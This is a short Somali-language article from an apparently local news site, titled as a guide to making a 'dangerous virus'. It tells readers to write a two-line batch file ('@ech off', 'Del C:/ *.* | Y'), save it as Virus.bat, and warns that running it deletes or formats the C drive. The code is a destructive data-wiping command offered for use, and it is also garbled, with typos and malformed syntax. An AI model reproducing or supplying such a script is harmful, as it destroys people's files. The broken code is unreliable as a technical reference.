Sidaad U Samayn Kartaa Virus Halis Ah? Ka Baro Halkan

0
319

Hargeisa (Tayosame news) waxa jira virus badan oo saameeya computerka walow ay  siyaabo kala duwan u saameeyaan inkasta magaca virus ay ka siman yihiin.

Hadaan ka hadalno dhinaca computer-da, virus-ku ma aha, kii noolaha ku dhici jiray, ee xanuunka keeni jiray Virus-ka computer-ku waa program wax yeeleyna programyada kale ee computer-kaaga ku jira. taas oo sababta in ugu danbeyntii in aand furin karin programs kuugu jira computerka ama khasab kugu noqonaysa inaad soo iibsato anti-virus.

hadaba halkan ka baro sidad usamayn lahayd virus

Qodobka Koowaad- Waa inaad furtaa Notepad-ka kombiyuutarkaaga ama wax u dhigma.

Qodobka Labaad qor code-kan ku qoran xaga hoose

@ech off
Del C:/ *.* | Y

Qodobka Saddexaad Save garee oo Ku save garee Virus.bat

     DIGNIIN

Fadlan haku furin kombiyuurkaaga sababta oo ah waxa uu delete-garaynayaa kombiyuutarkaaga
ama wuu format garaynayaa C Drive-ka kombiyuutarkaaga

Masuul kama ihi wixii dhib ah ee soo gaadha kombiyuutarkaaga

Diyaariye: Tayasiir H Mas-mas                                                                                             Tell: +252-63-4754871                                                                                                       Email: Tayo.masmas@gmail.com

 

LEAVE A REPLY

Please enter your comment!
Please enter your name here

This site uses Akismet to reduce spam. Learn how your comment data is processed.